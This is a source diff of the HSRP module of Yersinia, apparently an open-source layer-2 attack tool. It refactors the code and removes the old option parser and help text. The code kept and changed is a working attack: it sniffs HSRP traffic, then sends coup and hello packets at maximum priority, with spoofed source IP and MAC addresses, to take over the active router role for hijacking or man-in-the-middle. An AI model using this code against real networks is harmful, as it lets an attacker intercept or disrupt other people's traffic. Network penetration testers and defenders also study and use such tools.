@@ -24,7 +24,7 @@
 
 #ifndef lint
 static const char rcsid[] = 
-       "$Id: hsrp.c,v 1.7 2005/09/13 12:10:39 t0mac Exp $";
+       "$Id: hsrp.c 17 2006-04-17 21:02:28Z tomac $";
 #endif
 
 #ifdef HAVE_CONFIG_H
@@ -79,12 +79,6 @@ static const char rcsid[] =
 #include <pthread.h>
 #endif
 
-#ifdef HAVE_GETOPT_LONG_ONLY
-#include <getopt.h>
-#else
-#include "getopt.h"
-#endif
-
 #include <stdarg.h>
 
 #include "hsrp.h"
@@ -93,10 +87,61 @@ static const char rcsid[] =
 void
 hsrp_register(void)
 {
-    protocol_register(PROTO_HSRP, "HSRP", "Hot Standby Router Protocol", sizeof(struct hsrp_data), hsrp_init_attribs, NULL,
-	    hsrp_get_printable_packet, hsrp_get_printable_store,
-	    hsrp_load_values, hsrp_update_data, hsrp_attack, hsrp_help,
-        hsrp_parser, hsrp_fields, hsrp_get_info, hsrp_update_field, hsrp_features);
+   protocol_register(PROTO_HSRP, "HSRP", "Hot Standby Router Protocol", 
+         "hsrp", sizeof(struct hsrp_data), hsrp_init_attribs, NULL,
+         hsrp_get_printable_packet, hsrp_get_printable_store,
+         hsrp_load_values, hsrp_attack, 
+         hsrp_update_field, 
+         hsrp_features, hsrp_comm_params, SIZE_ARRAY(hsrp_comm_params), 
+         NULL, 0, NULL, hsrp_init_comms_struct, PROTO_VISIBLE, hsrp_end);
+}
+
+/*
+ * Inicializa la estructura que se usa para relacionar el tmp_data
+ * de cada nodo con los datos que se sacaran por pantalla cuando
+ * se accede al demonio de red.
+ * Teoricamente como esta funcion solo se llama desde term_add_node()
+ * la cual, a su vez, solo es llamada al tener el mutex bloqueado por
+ * lo que no veo necesario que sea reentrante. (Fredy). 
+ */
+int8_t
+hsrp_init_comms_struct(struct term_node *node)
+{
+    struct hsrp_data *hsrp_data;
+    void **comm_param;
+ 
+    comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(hsrp_comm_params));
+    
+    if (comm_param == NULL)
+    {
+       thread_error("hsrp_init_commands_struct calloc error",errno);
+       return -1;
+    }
+
+    hsrp_data = node->protocol[PROTO_HSRP].tmp_data;
+    
+    node->protocol[PROTO_HSRP].commands_param = comm_param;
+
+    comm_param[HSRP_SMAC] = &hsrp_data->mac_source;
+    comm_param[HSRP_DMAC] = &hsrp_data->mac_dest; 
+    comm_param[HSRP_SIP] = &hsrp_data->sip;
+    comm_param[HSRP_DIP] = &hsrp_data->dip;
+    comm_param[HSRP_SPORT] = &hsrp_data->sport;
+    comm_param[HSRP_DPORT] = &hsrp_data->dport;
+    comm_param[HSRP_VER] = &hsrp_data->version;
+    comm_param[HSRP_OPCODE] = &hsrp_data->opcode;
+    comm_param[HSRP_STATE] = &hsrp_data->state;
+    comm_param[HSRP_HELLO_TIME] = &hsrp_data->hello_time;
+    comm_param[HSRP_HOLD_TIME] = &hsrp_data->hold_time;
+    comm_param[HSRP_PRIORITY] = &hsrp_data->priority;
+    comm_param[HSRP_GROUP] = &hsrp_data->group;
+    comm_param[HSRP_RESERVED] = &hsrp_data->reserved;
+    comm_param[HSRP_AUTHDATA] = &hsrp_data->authdata;
+    comm_param[HSRP_VIRTUALIP] = &hsrp_data->virtual_ip;
+    comm_param[16] = NULL; 
+    comm_param[17] = NULL; 
+
+    return 0;
 }
 
 
@@ -151,74 +196,78 @@ hsrp_th_send_raw_exit(struct attacks *attacks)
 void
 hsrp_th_become_active(void *arg)
 {
-    struct pcap_pkthdr header;
-    struct pcap_data pcap_aux;
-    struct attacks *attacks=NULL;
-    struct hsrp_data *hsrp_data;
-    struct timeval now;
-    sigset_t mask;
-    struct attack_param *param=NULL;
-    u_int32_t lbl32;
+   struct pcap_pkthdr header;
+   struct pcap_data pcap_aux;
+   struct attacks *attacks=NULL;
+   struct hsrp_data *hsrp_data;
+   struct timeval now;
+   sigset_t mask;
+   struct attack_param *param=NULL;
+   u_int32_t lbl32;
+   dlist_t *p;
+   struct interface_data *iface_data;
 
-    attacks = arg;
-    
-    pthread_mutex_lock(&attacks->attack_th.finished);
+   attacks = arg;
 
-    pthread_detach(pthread_self());
+   pthread_mutex_lock(&attacks->attack_th.finished);
 
-    sigfillset(&mask);
+   pthread_detach(pthread_self());
 
-    if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
-    {
-       thread_error("hsrp_send_discover pthread_sigmask()",errno);
-       hsrp_th_become_active_exit(attacks);    
-    }
+   sigfillset(&mask);
 
-    hsrp_data = attacks->data;
+   if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
+   {
+      thread_error("hsrp_send_discover pthread_sigmask()",errno);
+      hsrp_th_become_active_exit(attacks);    
+   }
 
-    param = attacks->params;
-    
-    gettimeofday(&now,NULL);
-    
-    header.ts.tv_sec = now.tv_sec;
-    header.ts.tv_usec = now.tv_usec;
+   hsrp_data = attacks->data;
 
-    if (hsrp_learn_packet(ALL_INTS, &attacks->attack_th.stop, attacks->data,&header, &pcap_aux) < 0)
-         hsrp_th_become_active_exit(attacks);
+   param = attacks->params;
 
-    hsrp_data->opcode = HSRP_TYPE_COUP;
-    hsrp_data->state = HSRP_STATE_SPEAK;
+   gettimeofday(&now,NULL);
 
-    if (attacks->attack == HSRP_ATTACK_BECOME_ACTIVE)
-    {
-        memcpy((void *)&hsrp_data->sip, (void *)param[HSRP_SOURCE_IP].value, 4);
-    }
-    else 
-       if (attacks->attack == HSRP_ATTACK_MITM_BECOME_ACTIVE) {
-          /* Get interface's ip address */
-          hsrp_data->sip = ntohl(inet_addr(interfaces[pcap_aux.iface].ipaddr));
+   header.ts.tv_sec = now.tv_sec;
+   header.ts.tv_usec = now.tv_usec;
 
-		  /* libnet fix */
-		  lbl32 = ntohl(hsrp_data->sip);
-		  memcpy((void *)&hsrp_data->sip, &lbl32, 4);
-	   }
+   if (hsrp_learn_packet(attacks, NULL, &attacks->attack_th.stop, attacks->data,&header, &pcap_aux) < 0)
+      hsrp_th_become_active_exit(attacks);
 
-	/* libnet fix */
-	hsrp_data->dip = inet_addr("224.0.0.2");
-    /* Max priority */
-    hsrp_data->priority = 0xFF;
+   hsrp_data->opcode = HSRP_TYPE_COUP;
+   hsrp_data->state = HSRP_STATE_SPEAK;
 
-    hsrp_send_packet(attacks);
+   if (attacks->attack == HSRP_ATTACK_BECOME_ACTIVE)
+   {
+      memcpy((void *)&hsrp_data->sip, (void *)param[HSRP_SOURCE_IP].value, 4);
+   }
+   else 
+      if (attacks->attack == HSRP_ATTACK_MITM_BECOME_ACTIVE) {
+         /* Get interface's ip address */
+         p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, pcap_aux.iface);
+         iface_data = (struct interface_data *) dlist_data(p);
+         hsrp_data->sip = ntohl(inet_addr(iface_data->ipaddr));
 
-    hsrp_data->opcode = HSRP_TYPE_HELLO;
-    hsrp_data->state = HSRP_STATE_ACTIVE;
+         /* libnet fix */
+         lbl32 = ntohl(hsrp_data->sip);
+         memcpy((void *)&hsrp_data->sip, &lbl32, 4);
+      }
 
-    thread_create(&attacks->helper_th.id, &hsrp_send_hellos, attacks);
+   /* libnet fix */
+   hsrp_data->dip = inet_addr("224.0.0.2");
+   /* Max priority */
+   hsrp_data->priority = 0xFF;
 
-    while (!attacks->attack_th.stop)
-       usleep(200000);
+   hsrp_send_packet(attacks);
 
-    hsrp_th_become_active_exit(attacks);
+   hsrp_data->opcode = HSRP_TYPE_HELLO;
+   hsrp_data->state = HSRP_STATE_ACTIVE;
+
+   thread_create(&attacks->helper_th.id, &hsrp_send_hellos, attacks);
+
+   while (!attacks->attack_th.stop)
+      thread_usleep(200000);
+
+   hsrp_th_become_active_exit(attacks);
 }
 
 
@@ -287,114 +336,116 @@ write_log(0," hsrp_helper: %d finished...\n",(int)pthread_self());
 int8_t
 hsrp_send_packet(struct attacks *attacks)
 {
-    libnet_ptag_t t;
-    int sent;
-    u_int8_t i;
-    u_int16_t len;
-    struct hsrp_data *hsrp_data;
-    u_int8_t *hsrp_packet, *aux;
-    libnet_t *lhandler;
+   libnet_ptag_t t;
+   int sent;
+   u_int16_t len;
+   struct hsrp_data *hsrp_data;
+   u_int8_t *hsrp_packet, *aux;
+   libnet_t *lhandler;
+   dlist_t *p;
+   struct interface_data *iface_data;
+   struct interface_data *iface_data2;
 
-    hsrp_data = attacks->data;
-    hsrp_packet = calloc(1, HSRP_PACKET_SIZE);
+   hsrp_data = attacks->data;
+   hsrp_packet = calloc(1, HSRP_PACKET_SIZE);
 
-    aux = hsrp_packet;
-    *aux = hsrp_data->version; aux++;
-    *aux = hsrp_data->opcode; aux++;
-    *aux = hsrp_data->state; aux++;
-    *aux = hsrp_data->hello_time; aux++;
-    *aux = hsrp_data->hold_time; aux++;
-    *aux = hsrp_data->priority; aux++;
-    *aux = hsrp_data->group; aux++;
-    *aux = hsrp_data->reserved; aux++;
+   aux = hsrp_packet;
+   *aux = hsrp_data->version; aux++;
+   *aux = hsrp_data->opcode; aux++;
+   *aux = hsrp_data->state; aux++;
+   *aux = hsrp_data->hello_time; aux++;
+   *aux = hsrp_data->hold_time; aux++;
+   *aux = hsrp_data->priority; aux++;
+   *aux = hsrp_data->group; aux++;
+   *aux = hsrp_data->reserved; aux++;
 
-    len = strlen(hsrp_data->authdata);
-    memcpy((void *)aux, (void *)hsrp_data->authdata, (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH);
-//    aux += (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH;
-    aux += 8;
+   len = strlen(hsrp_data->authdata);
+   memcpy((void *)aux, (void *)hsrp_data->authdata, (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH);
+   /*    aux += (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH;*/
+   aux += 8;
 
-    (*(u_int32_t *)aux) = (u_int32_t) htonl(hsrp_data->virtual_ip);
+   (*(u_int32_t *)aux) = (u_int32_t) htonl(hsrp_data->virtual_ip);
 
-    for ( i = 0; i < MAX_INTERFACES; i++) {
-        if (attacks->used_ints[i] == 1) {
-            lhandler = interfaces[i].libnet_handler;
+   for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
+      iface_data = (struct interface_data *) dlist_data(p);
+      lhandler = iface_data->libnet_handler;
 
-            t = libnet_build_udp(
-                hsrp_data->sport,                               /* source port */
-                hsrp_data->dport,                               /* destination port */
-                LIBNET_UDP_H + HSRP_PACKET_SIZE,                /* packet size */
-                0,                                              /* checksum */
-                hsrp_packet,                                    /* payload */
-                HSRP_PACKET_SIZE,                               /* payload size */
-                lhandler,                                       /* libnet handle */
-                0);                                             /* libnet id */
+      t = libnet_build_udp(
+            hsrp_data->sport,                               /* source port */
+            hsrp_data->dport,                               /* destination port */
+            LIBNET_UDP_H + HSRP_PACKET_SIZE,                /* packet size */
+            0,                                              /* checksum */
+            hsrp_packet,                                    /* payload */
+            HSRP_PACKET_SIZE,                               /* payload size */
+            lhandler,                                       /* libnet handle */
+            0);                                             /* libnet id */
 
-            if (t == -1) 
-            {
-                thread_libnet_error( "Can't build udp datagram",lhandler);
-                libnet_clear_packet(lhandler);
-                return -1;
-            }  
+      if (t == -1) 
+      {
+         thread_libnet_error( "Can't build udp datagram",lhandler);
+         libnet_clear_packet(lhandler);
+         return -1;
+      }  
 
-            t = libnet_build_ipv4(
-                LIBNET_IPV4_H + LIBNET_UDP_H + HSRP_PACKET_SIZE,/* length */
-                0x10,                                           /* TOS */
-                0,                                              /* IP ID */
-                0,                                              /* IP Frag */
-                1,                                              /* TTL */
-                IPPROTO_UDP,                                    /* protocol */
-                0,                                              /* checksum */
-                hsrp_data->sip,                                 /* src ip */
-                hsrp_data->dip,                                 /* destination ip */
-                NULL,                                           /* payload */
-                0,                                              /* payload size */
-                lhandler,                                       /* libnet handle */
-                0);                                             /* libnet id */
+      t = libnet_build_ipv4(
+            LIBNET_IPV4_H + LIBNET_UDP_H + HSRP_PACKET_SIZE,/* length */
+            0x10,                                           /* TOS */
+            0,                                              /* IP ID */
+            0,                                              /* IP Frag */
+            1,                                              /* TTL */
+            IPPROTO_UDP,                                    /* protocol */
+            0,                                              /* checksum */
+            hsrp_data->sip,                                 /* src ip */
+            hsrp_data->dip,                                 /* destination ip */
+            NULL,                                           /* payload */
+            0,                                              /* payload size */
+            lhandler,                                       /* libnet handle */
+            0);                                             /* libnet id */
 
-            if (t == -1) 
-            {
-                thread_libnet_error("Can't build ipv4 packet",lhandler);
-                libnet_clear_packet(lhandler);
-                return -1;
-            }  
+      if (t == -1) 
+      {
+         thread_libnet_error("Can't build ipv4 packet",lhandler);
+         libnet_clear_packet(lhandler);
+         return -1;
+      }  
 
-            t = libnet_build_ethernet(
-                    hsrp_data->mac_dest,                /* ethernet destination */
-                    (attacks->mac_spoofing) ? hsrp_data->mac_source : interfaces[i].etheraddr,
-                    /* ethernet source */
-                    ETHERTYPE_IP,
-                    NULL,                               /* payload */
-                    0,                                  /* payload size */
-                    lhandler,                           /* libnet handle */
-                    0);                                 /* libnet id */
+      t = libnet_build_ethernet(
+            hsrp_data->mac_dest,                /* ethernet destination */
+            (attacks->mac_spoofing) ? hsrp_data->mac_source : iface_data->etheraddr,
+            /* ethernet source */
+            ETHERTYPE_IP,
+            NULL,                               /* payload */
+            0,                                  /* payload size */
+            lhandler,                           /* libnet handle */
+            0);                                 /* libnet id */
 
-            if (t == -1)
-            {
-                thread_libnet_error("Can't build ethernet header",lhandler);
-                libnet_clear_packet(lhandler);
-                return -1;
-            }
+      if (t == -1)
+      {
+         thread_libnet_error("Can't build ethernet header",lhandler);
+         libnet_clear_packet(lhandler);
+         return -1;
+      }
 
-            /*
-             *  Write it to the wire.
-             */
-            sent = libnet_write(lhandler);
+      /*
+       *  Write it to the wire.
+       */
+      sent = libnet_write(lhandler);
 
-            if (sent == -1) {
-                thread_libnet_error("libnet_write error", lhandler);
-                libnet_clear_packet(lhandler);
-                return -1;
-            }
+      if (sent == -1) {
+         thread_libnet_error("libnet_write error", lhandler);
+         libnet_clear_packet(lhandler);
+         return -1;
+      }
 
-            libnet_clear_packet(lhandler);
-            protocols[PROTO_HSRP].packets_out++;
-            interfaces[i].packets_out[PROTO_HSRP]++;
-        }
-    }
+      libnet_clear_packet(lhandler);
+      protocols[PROTO_HSRP].packets_out++;
+      iface_data2 = interfaces_get_struct(iface_data->ifname);
+      iface_data2->packets_out[PROTO_HSRP]++;
+   }
 
-    free(hsrp_packet);
-    
-    return 0;
+   free(hsrp_packet);
+
+   return 0;
 }
 
 
@@ -402,25 +453,33 @@ hsrp_send_packet(struct attacks *attacks)
  *
  */
 int8_t
-hsrp_learn_packet(int8_t iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header, struct pcap_data *pcap_aux)
+hsrp_learn_packet(struct attacks *attacks, char *iface, u_int8_t *stop, void *data, struct pcap_pkthdr *header, struct pcap_data *pcap_aux)
 {
     struct hsrp_data *hsrp_data;
     u_int8_t got_hsrp_packet = 0;
     u_int8_t *packet;
-    int8_t iface_learn;
+    dlist_t *p;
+    struct interface_data *iface_data;
     
     hsrp_data = data;
 
     if ((packet = calloc(1, SNAPLEN)) == NULL)
         return -1;
 
+    if (iface) {
+       p = dlist_search(attacks->used_ints->list, attacks->used_ints->cmp, iface);
+       if (!p)
+          return -1;
+
+       iface_data = (struct interface_data *) dlist_data(p);
+    } else {
+       iface_data = NULL;
+    }
+
     while (!got_hsrp_packet && !(*stop))
     {
-        iface_learn = interfaces_get_packet(stop, header, packet, PROTO_HSRP, NO_TIMEOUT);
+        interfaces_get_packet(attacks->used_ints, iface_data, stop, header, packet, PROTO_HSRP, NO_TIMEOUT);
 
-        if ( (iface !=ALL_INTS) && (iface != iface_learn))
-            continue;
-            
         if (*stop)
         {
             free(packet);
@@ -581,7 +640,7 @@ hsrp_get_printable_packet(struct pcap_data *data)
 #endif
     char **field_values;
 
-    if ((field_values = (char **) protocol_create_printable(HSRP_TOTAL_FIELDS, hsrp_fields)) == NULL) {
+    if ((field_values = (char **) protocol_create_printable(protocols[PROTO_HSRP].nparams, protocols[PROTO_HSRP].parameters)) == NULL) {
 	    write_log(0, "Error in calloc\n");
 	    return NULL;
     }
@@ -673,7 +732,8 @@ hsrp_get_printable_store(struct term_node *node)
     /* smac + dmac + sip + dip + sport + dport + ver + opcode + state + hello +
      * hold + priority + group + reserved + auth + vip + null = 17
      */
-    if ((field_values = (char **) protocol_create_printable(HSRP_TOTAL_FIELDS, hsrp_fields)) == NULL) {
+
+    if ((field_values = (char **) protocol_create_printable(protocols[PROTO_HSRP].nparams, protocols[PROTO_HSRP].parameters)) == NULL) {
 	    write_log(0, "Error in calloc\n");
 	    return NULL;
     }
@@ -730,32 +790,6 @@ hsrp_get_printable_store(struct term_node *node)
 }
 
 
-char *
-hsrp_get_info(u_int8_t field, char *value)
-{
-    u_int8_t i;
-
-    i = 0;
-    switch (field) {
-        case HSRP_OPCODE:
-            while (hsrp_opcode[i].desc) {
-                if (hsrp_opcode[i].type == strtoul(value, NULL, 16))
-                    return hsrp_opcode[i].desc;
-                i++;
-            }
-        break;
-        case HSRP_STATE:
-            while (hsrp_state[i].desc) {
-                if (hsrp_state[i].type == strtoul(value, NULL, 16))
-                    return hsrp_state[i].desc;
-                i++;
-            }
-        break;
-    }
-
-    return "(Unknown)";
-}
-
 int8_t 
 hsrp_update_field(int8_t state, struct term_node *node, void *value)
 {
@@ -844,360 +878,9 @@ hsrp_update_field(int8_t state, struct term_node *node, void *value)
 
 
 
-int8_t 
-hsrp_update_data(int8_t state, int8_t key, int8_t position, struct term_node *node)
+
+int8_t
+hsrp_end(struct term_node *node)
 {
-    struct in_addr addr;
-    struct hsrp_data *hsrp_data;
-    u_int32_t aux_long;
-    u_int8_t i;
-    char **hsrp;
-
-    hsrp_data = node->protocol[PROTO_HSRP].tmp_data;
-
-    if ((hsrp = hsrp_get_printable_store(node)) == NULL) {
-	    write_log(0, "Error in hsrp_get_printable_store\n");
-	    return -1;
-    }
-
-    switch(state)
-    {
-        /* Source MAC */
-        case HSRP_SMAC:
-            hsrp[0][position] = key;
-            for (i=0; i < 6; i++) 
-                hsrp_data->mac_source[i] = strtoul(&hsrp[0][3*i], (char **)NULL, 16);
-        break;
-
-        /* Destination MAC */
-        case HSRP_DMAC:
-            hsrp[1][position] = key;
-            for (i=0; i < 6; i++) 
-                hsrp_data->mac_dest[i] = strtoul(&hsrp[1][3*i], (char **)NULL, 16);
-        break;
-
-        /* SIP */
-        case HSRP_SIP:
-            hsrp[2][position] = key;
-            if (parser_get_inet_aton(hsrp[2], &addr) < 0) {
-                write_log(0, "Error in parser_get_inet_aton\n");
-                return -1;
-            }
-            aux_long = ntohl(addr.s_addr);
-            memcpy((void *)&hsrp_data->sip, (void *)&aux_long, 4);
-        break;
-
-        /* DIP */
-        case HSRP_DIP:
-            hsrp[3][position] = key;
-            if (parser_get_inet_aton(hsrp[3], &addr) < 0) {
-                write_log(0, "Error in parser_get_inet_aton\n");
-                return -1;
-            }
-            aux_long = ntohl(addr.s_addr);
-            memcpy((void *)&hsrp_data->dip, (void *)&aux_long, 4);
-        break;
-
-        /* Sport */
-        case HSRP_SPORT:
-            hsrp[4][position] = key;
-            hsrp_data->sport = strtoul(hsrp[4], (char **)NULL, 10);
-        break;
-
-        /* Dport */
-        case HSRP_DPORT:
-            hsrp[5][position] = key;
-            hsrp_data->dport = strtoul(hsrp[5], (char **)NULL, 10);
-        break;
-
-        /* Version */
-        case HSRP_VER:
-            hsrp[6][position] = key;
-            hsrp_data->version = strtoul(hsrp[6], (char **)NULL, 16);
-        break;
-            
-        /* Opcode */
-        case HSRP_OPCODE:
-            hsrp[7][position] = key;
-            hsrp_data->opcode = strtoul(hsrp[7], (char **)NULL, 16);
-        break;
-        
-        /* State */
-        case HSRP_STATE:
-            hsrp[8][position] = key;
-            hsrp_data->state = strtoul(hsrp[8], (char **)NULL, 16);
-        break;
-
-        /* Hello time */
-        case HSRP_HELLO_TIME:
-            hsrp[9][position] = key;
-            hsrp_data->hello_time = strtoul(hsrp[9], (char **)NULL, 16);
-        break;
-
-        /* Hold time */
-        case HSRP_HOLD_TIME:
-            hsrp[10][position] = key;
-            hsrp_data->hold_time = strtoul(hsrp[10], (char **)NULL, 16);
-        break;
-
-        /* Priority */
-        case HSRP_PRIORITY:
-            hsrp[11][position] = key;
-            hsrp_data->priority = strtoul(hsrp[11], (char **)NULL, 16);
-        break;
-
-        /* Group */
-        case HSRP_GROUP:
-            hsrp[12][position] = key;
-            hsrp_data->group = strtoul(hsrp[12], (char **)NULL, 16);
-        break;
-
-        /* Group */
-        case HSRP_RESERVED:
-            hsrp[13][position] = key;
-            hsrp_data->reserved = strtoul(hsrp[13], (char **)NULL, 16);
-        break;
-
-        /* Authdata */
-        case HSRP_AUTHDATA:
-            hsrp[14][position] = key;
-            memcpy((void *)hsrp_data->authdata, (void *)hsrp[14], 8);
-        break;
-
-        /* Virtual IP */
-        case HSRP_VIRTUALIP:
-            hsrp[15][position] = key;
-            if (parser_get_inet_aton(hsrp[15], &addr) < 0) {
-                write_log(0, "Error in inet_aton\n");
-                return -1;
-            }
-            aux_long = ntohl(addr.s_addr);
-            memcpy((void *)&hsrp_data->virtual_ip, (void *)&aux_long, 4);
-        break;
-
-    }
-
-    i = 0;
-    while(hsrp[i]) {
-	free(hsrp[i]);
-	i++;
-    }
-
-    free(hsrp);
-
-    return 0;
-}
-
-
-void
-hsrp_help(void)
-{
-    write_log(2,"%s\n", bin_data);
-    write_log(2,"\nUsage: %s hsrp [-hM] [-i interface]\n", PACKAGE);
-    write_log(2,"       [-smac hw_addr] [-dmac hw_addr] [-sip addr] [-dip addr] [-sport port] [-dport port]\n");
-    write_log(2,"       [-version version] [-opcode opcode] [-state state] [-hello_time secs] [-hold_time secs]\n");
-    write_log(2,"       [-priority priority] [-group group] [-reserved reserved] [-authdata string]\n");
-    write_log(2,"       [-virtualip addr] [-version version] [-attack attack]\n\n");
-    write_log(2,"           -h    This help screen.\n\n");         
-
-    write_log(2,"Please, see the man page for a full list of options and many examples.\n");
-    write_log(2,"Send your bugs & suggestions to the Yersinia developers <yersinia@wasahero.org>\n\n");  
-}
-
-
-/*
- * HSRP parser...
- */
-int8_t 
-hsrp_parser( struct term_node *node, int8_t argc, char **args, void *tmp_data)
-{
-    int8_t carac, indx, aux, tmp, ifaces;
-    int opt_ind;
-    struct hsrp_data *hsrp_data;
-    struct term_tty *term_tty=NULL;
-    struct attack *first_attack;
-
-    static struct option options[] =
-    {
-        { "help",         0, 0, 'h' },        
-        { "M",            0, 0, 'M' },        
-        { "attack",       1, 0, 0 },
-        { "X",            1, 0, 0 },
-        { "i",            1, 0, 1 },
-        { "version",      1, 0, 2 },
-        { "opcode",       1, 0, 3 },
-        { "state",        1, 0, 4 },
-        { "hello_time",   1, 0, 5 },
-        { "hold_time",    1, 0, 6 },
-        { "priority",     1, 0, 7 },
-        { "group",        1, 0, 8 },
-        { "reserved",     1, 0, 9 },
-        { "authdata",     1, 0, 10 },
-        { "virtualip",    1, 0, 11 },
-        { "sport",        1, 0, 12 },
-        { "dport",        1, 0, 13 },
-        { "sip",          1, 0, 14 },
-        { "dip",          1, 0, 15 },
-        { "smac",         1, 0, 16 },
-        { "dmac",         1, 0, 17 },
-        { 0, 0, 0, 0 }
-    };
-
-    hsrp_data = node->protocol[PROTO_DTP].tmp_data;
-
-    ifaces = 0;
-
-    term_tty = node->specific;
-
-    while( (carac=getopt_long_only(argc,args,"h",
-                    options, &opt_ind)) != EOF)
-    {
-        switch(carac) 
-        {
-            case 0:
-                aux=atoi(optarg);
-                aux--;  /* Because our array starts with zero but user starts with 1... :) */
-                indx = parser_command2index(hsrp_attack, aux);
-                if (hsrp_attack[indx].s != NULL )
-                    term_tty->attack = indx;
-                else
-                {
-                    write_log(2,"\n  Ouch!! Invalid attack!! Valid %s ATTACK types are:\n", PACKAGE);
-                    first_attack = hsrp_attack;
-                    while (first_attack->s != NULL) 
-                    {
-                        write_log(2,"         %d: %s attack %s\n",first_attack->v+1,
-                                (first_attack->type)?"DOS":"NONDOS",
-                                first_attack->s);
-                        ++first_attack;
-                    }
-                    write_log(2,"\n");
-                    return -1;
-                }
-                break;
-
-            case 1:
-                if ((tmp = interfaces_get(optarg)) == -1)
-                {
-                   write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n",optarg);
-                   return -1;
-                }
-                 /* Don't repeat interface...*/
-                if (!node->used_ints[tmp])
-                {
-                    if ((tmp = interfaces_add(optarg)) == -1)
-                    {
-                       write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n",optarg);
-                       return -1;
-                    }
-                    node->used_ints[tmp] = 1;
-                    ifaces++;
-                }
-            break;
-
-            case 2:
-                hsrp_data->version = atoi(optarg);
-            break;
-            
-            case 3:
-                hsrp_data->opcode = atoi(optarg);
-            break;
-
-            case 4:
-                hsrp_data->state = atoi(optarg);
-            break;
-
-            case 5:
-                hsrp_data->hello_time = atoi(optarg);
-            break;
-
-            case 6:
-                hsrp_data->hold_time = atoi(optarg);
-            break;
-
-            case 7:
-                hsrp_data->priority = atoi(optarg);
-            break;
-
-            case 8:
-                hsrp_data->group = atoi(optarg);
-            break;
-
-            case 9:
-                hsrp_data->reserved = atoi(optarg);
-            break;
-
-            case 10:
-                strncpy(hsrp_data->authdata, optarg, HSRP_AUTHDATA_LENGTH);
-            break;
-
-            case 11:
-                hsrp_data->virtual_ip = inet_addr(optarg);
-            break;
-
-            case 12:
-                hsrp_data->sport = atoi(optarg);
-            break;
-
-            case 13:
-                hsrp_data->sport = atoi(optarg);
-            break;
-
-            case 14:
-                hsrp_data->sip = inet_addr(optarg);
-            break;
-
-            case 15:
-                hsrp_data->dip = inet_addr(optarg);
-            break;
-
-            case 16:
-                if (parser_vrfy_mac(optarg, hsrp_data->mac_source)) {
-                    write_log(2, "Source MAC address incorrect!!\n");
-                    return -1;
-                }
-
-            case 17: 
-                if ( parser_vrfy_mac(optarg, hsrp_data->mac_dest) )
-                {
-                    write_log(2,"Destination MAC address incorrect!!\n");
-                    return -1;
-                }
-            break;
-
-            case 'h': hsrp_help();
-                      return 0;
-            break;
-
-			case 'M':
-			    node->mac_spoofing = 0;
-			break;
-
-            case '?': return -1;
-            break;       
-        }
-    }
-
-    /* select a default device if not specified */
-    if (!ifaces)  {
-        if (strlen(interfaces[0].ifname)) {
-            write_log(2,"Warning: interface %s selected as the default one\n", &interfaces[0].ifname);
-            if ((tmp = interfaces_add(interfaces[0].ifname)) == -1)
-            {
-               write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n", interfaces[0].ifname);
-               return -1;
-            }
-            else
-                node->used_ints[tmp] = 1;
-                ifaces++;
-        } else {
-            write_log(2,"Hmm... you don't have any valid interface. Go and get a life!\n");
-            return -1;
-        }
-    }
-
    return 0;
-
 }
-
-/* vim:set tabstop=4:set expandtab:set shiftwidth=4:set textwidth=78: */
